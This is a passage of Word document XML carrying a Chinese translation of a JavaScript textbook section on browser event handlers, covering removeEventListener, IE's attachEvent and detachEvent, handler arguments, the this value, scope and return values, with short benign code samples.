      </w:pPr>
      <w:r>
        <w:t>相对</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>的是</w:t>
      </w:r>
      <w:r>
        <w:t>removeEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，它同样有三个参数，从对象中删除事件处</w:t>
      </w:r>
      <w:r>
        <w:t>理程序函数而非添加，它常用于临时注册事件处理程序，然后不久就删除它。例如，当你要得到</w:t>
      </w:r>
      <w:r>
        <w:t>mousedown</w:t>
      </w:r>
      <w:r>
        <w:t>事件时，可以为</w:t>
      </w:r>
      <w:r>
        <w:t>mousemove</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>mouseup</w:t>
      </w:r>
      <w:r>
        <w:t>事件注册临时捕获事件处理程序来看看用户是否拖动鼠标。当</w:t>
      </w:r>
      <w:r>
        <w:t>mouseup</w:t>
      </w:r>
      <w:r>
        <w:t>事件到来后，可以注销这些事件处理程序。在这种情况下，事件处理程序移除代码如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.removeEventListener("mousemove",handleMouseMove,true);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.removeEventListener("mouseup",h</w:t>
      </w:r>
      <w:r>
        <w:t>andleMouseUp,true);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="433" w:name="17_2_4_attachEvent__"/>
      <w:r>
        <w:t>17.2.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>attachEvent()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="433"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>IE9</w:t>
      </w:r>
      <w:r>
        <w:t>之前的</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>不支持</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>removeEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>IE5</w:t>
      </w:r>
      <w:r>
        <w:t>及以后版本定义了类似的方法</w:t>
      </w:r>
      <w:r>
        <w:t>attachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>detachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>attachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>detachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的工作原理与</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>removeEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>类似，但有如下例外：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>因为</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件模型不支持事件捕获，所以</w:t>
      </w:r>
      <w:r>
        <w:t>attachEvent(</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>detachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>要求只有两个参数：事件类型和处理程序函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·IE</w:t>
      </w:r>
      <w:r>
        <w:t>方法的第一个参数使用了带</w:t>
      </w:r>
      <w:r>
        <w:t>"on"</w:t>
      </w:r>
      <w:r>
        <w:t>前缀的事件处理程序属性名，而非没有前缀的事件类型。例如，当给</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>传递</w:t>
      </w:r>
      <w:r>
        <w:t>"click"</w:t>
      </w:r>
      <w:r>
        <w:t>时，要给</w:t>
      </w:r>
      <w:r>
        <w:t>attachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>传递</w:t>
      </w:r>
      <w:r>
        <w:t>"onclick"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·attachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>允许相同的事件处理程序函数注册多次。当特定的事件类型发生时，注册函数的调用次数和注册次数一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>经常可以看到的事件处理程序注册代码是在支持</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器中就调用它，否则</w:t>
      </w:r>
      <w:r>
        <w:t>就用</w:t>
      </w:r>
      <w:r>
        <w:t>attachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var b=document.getElementById("mybutton");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var handler=function(){alert("Thanks</w:t>
      </w:r>
      <w:r>
        <w:t>！</w:t>
      </w:r>
      <w:r>
        <w:t>");};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(b.addEventListener)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>b.addEventListener("click",handler,false);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else if(b.attachEvent)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>b.attachEvent("onclick",handler);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="434" w:name="17_3_Shi_Jian_Chu_Li_Cheng_Xu_De_Diao_Yo"/>
      <w:r>
        <w:t>17.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　事件处理程序的调用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="434"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一旦注册了事件处理程序，浏览器就会在指定对象上发生指定类型事件时自动调用它。本节会详细介绍事件处理程序的调用，说明事件处理程序的参数、调用上下文（</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>值）、调用作用域和事件处理程序返回值的意义。遗憾的是，这些内容中的一部分在</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>及以前版本中和在其他浏览器中是不同的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了介绍单个处理程序如何调用，本节也会说明事件传播的机制，即单个事件如何能在原始事件目标和文档的容器元素上触发多个处理程序的调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="435" w:name="17_3_1_Shi_Jian_Chu_Li_Cheng_Xu_De_Can_S"/>
      <w:r>
        <w:t>17.3.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　事件处理程序的参数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="435"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通常调用事件处理程序时把事件对象作为它们的一个参数（有一个例外，后面会介</w:t>
      </w:r>
      <w:r>
        <w:t>绍）。事件对象的属性提供了有关事件的详细信息。例如，</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定了发生的事件类型。</w:t>
      </w:r>
      <w:r>
        <w:t>17.1</w:t>
      </w:r>
      <w:r>
        <w:t>节提到了各种事件类型的一些其他事件对象属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>及以前版本中，通过设置属性注册事件处理程序，当调用它们时并未传递事件对象。取而代之，需要通过全局对象</w:t>
      </w:r>
      <w:r>
        <w:t>window.event</w:t>
      </w:r>
      <w:r>
        <w:t>来获得事件对象。出于互通性，你能像如下那样编写事件处理程序，这样如果没有参数就使用</w:t>
      </w:r>
      <w:r>
        <w:t>window.event</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function handler(event){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>event=event||window.event;//</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序代码出现在这里</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向使用</w:t>
      </w:r>
      <w:r>
        <w:t>attachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>注册的事件处理程序传递事件对象，但它们也能使用</w:t>
      </w:r>
      <w:r>
        <w:t>window.event</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>记得</w:t>
      </w:r>
      <w:r>
        <w:t>17.2.2</w:t>
      </w:r>
      <w:r>
        <w:t>节中的介绍，当通过设置</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性注册事件处理程序时，浏览器会把</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>编码转换到一个函数中。非</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器使用</w:t>
      </w:r>
      <w:r>
        <w:t>event</w:t>
      </w:r>
      <w:r>
        <w:t>参数来构造函数，而</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>在构造函数时没有要求参数。如果在这样的函数中使用</w:t>
      </w:r>
      <w:r>
        <w:t>event</w:t>
      </w:r>
      <w:r>
        <w:t>标识符，那么引用的正是</w:t>
      </w:r>
      <w:r>
        <w:t>window.event</w:t>
      </w:r>
      <w:r>
        <w:t>。在这两种情况下，</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序都能作为</w:t>
      </w:r>
      <w:r>
        <w:t>event</w:t>
      </w:r>
      <w:r>
        <w:t>引用事件对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="436" w:name="17_3_2_Shi_Jian_Chu_Li_Cheng_Xu_De_Yun_X"/>
      <w:r>
        <w:t>17.3.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　事件处理程序的运行环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="436"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当通过设置属性</w:t>
      </w:r>
      <w:r>
        <w:t>注册事件处理程序时，这看起来好像是在文档元素上定义了新方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.onclick=function(){/*</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序代码</w:t>
      </w:r>
      <w:r>
        <w:t>*/};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>事件处理程序在事件目标上定义，所以它们作为这个对象的方法来调用（后面会介绍一个和</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>相关的例外）并不出人意料。这就是说，在事件处理程序内，</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>关键字指的是事件目标。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>甚至当使用</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>注册时，调用的处理程序使用事件目标作为它们的</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>值。但是，对于</w:t>
      </w:r>
      <w:r>
        <w:t>attachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>来讲这是不对的：使用</w:t>
      </w:r>
      <w:r>
        <w:t>attachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>注册的处理程序作为函数调</w:t>
      </w:r>
      <w:r>
        <w:t>用，它们的</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>值是全局（</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>）对象。可以用如下代码来解决这个问题：</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在指定的事件目标上注册用于处理指定类型事件的指定处理程序函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>确保处理程序一直作为事件目标的方法调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function addEvent(target,type,handler){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(target.addEventListener)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>target.addEventListener(type,handler,false);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>target.attachEvent("on"+type,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function(event){//</w:t>
      </w:r>
      <w:r>
        <w:t>把处理程序作为事件目标的方法调用，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>传递事件对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return handler.call(target,event);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注意使用这个方法注册的事件处理程序不能删除，因为传递给</w:t>
      </w:r>
      <w:r>
        <w:t>attachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>的包装函数没有保留下来传递给</w:t>
      </w:r>
      <w:r>
        <w:t>detachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="437" w:name="17_3_3_Shi_Jian_Chu_Li_Cheng_Xu_De_Zuo_Y"/>
      <w:r>
        <w:t>17.3.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　事件处理程序的作用域</w:t>
      </w:r>
      <w:bookmarkEnd w:id="437"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>像所有的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数一样，事件处理程序从词法上讲也是作用域。它们在其定义时的作用域而非调用时的作用域中执行，并且它们能存取那个作用域中的任何一个本地变量</w:t>
      </w:r>
      <w:r>
        <w:t>。例如，之前的</w:t>
      </w:r>
      <w:r>
        <w:t>addEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>函数就证明过。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>但是，通过</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性来注册事件处理程序是一个例外。它们被转换为能存取全局变量的顶级函数而非任何本地变量。但因为历史原因，它们运行在一个修改后的作用域链中。通过</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性定义的事件处理程序能好像本地变量一样使用目标对象、容器＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞对象（如果有）和</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象的属性。</w:t>
      </w:r>
      <w:r>
        <w:t>17.2.2</w:t>
      </w:r>
      <w:r>
        <w:t>节展示了如何从</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序属性中创建事件处理程序函数，以及其代码近似于使用</w:t>
      </w:r>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:t>语句修改后的作用域链。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性最不自然的地方包括冗长的代码串和修改后的作</w:t>
      </w:r>
      <w:r>
        <w:t>用域链允许有用的快捷方式。可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>tagName</w:t>
      </w:r>
      <w:r>
        <w:t>替代</w:t>
      </w:r>
      <w:r>
        <w:t>this.tagName</w:t>
      </w:r>
      <w:r>
        <w:t>，使用</w:t>
      </w:r>
      <w:r>
        <w:t>getElementById()</w:t>
      </w:r>
      <w:r>
        <w:t>替代</w:t>
      </w:r>
      <w:r>
        <w:t>document.getElementById()</w:t>
      </w:r>
      <w:r>
        <w:t>。并且，对</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>于＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞中的文档元素，能通过</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>引用任何其他的表单元素，例如，用</w:t>
      </w:r>
      <w:r>
        <w:t>zipcode</w:t>
      </w:r>
      <w:r>
        <w:t>替代</w:t>
      </w:r>
      <w:r>
        <w:t>this.form.zipcode</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>另一方面，</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序中修改的作用域链是陷阱之源，因为作用域链中每个对象的属性在全局对象中都有相同名字的属性。例如，由于</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象定义（很少使用）</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，因此</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序想</w:t>
      </w:r>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>方法就必须显式地写</w:t>
      </w:r>
      <w:r>
        <w:t>window.open</w:t>
      </w:r>
      <w:r>
        <w:t>而不是</w:t>
      </w:r>
      <w:r>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:t>。表单有类似的问题但破坏性更大，因为表单元素的名字和</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>在包含的表单元素上定义属性（见</w:t>
      </w:r>
      <w:r>
        <w:t>15.9.1</w:t>
      </w:r>
      <w:r>
        <w:t>节）。例如，如果表单包含一个</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>"location"</w:t>
      </w:r>
      <w:r>
        <w:t>的元素，那么要是表单的所有</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序想引用</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>location</w:t>
      </w:r>
      <w:r>
        <w:t>对象，就必须使用</w:t>
      </w:r>
      <w:r>
        <w:t>window.location</w:t>
      </w:r>
      <w:r>
        <w:t>而不能是</w:t>
      </w:r>
      <w:r>
        <w:t>location</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="438" w:name="17_3_4_Shi_Jian_Chu_Li_Cheng_Xu_De_Fan_H"/>
      <w:r>
        <w:t>17.3.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　事件处理程序的返回值</w:t>
      </w:r>
      <w:bookmarkEnd w:id="438"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通过设置对象属性或</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性注册事件处理程序的返回值有时是非常有意义的。通常情</w:t>
      </w:r>
      <w:r>
        <w:t>况下，返回值</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>就是告诉浏览器不要执行这个事件相关的默认操作。例如，表单提交按钮的</w:t>
      </w:r>
      <w:r>
        <w:t>onclick</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序能返回</w:t>
      </w:r>
      <w:r>
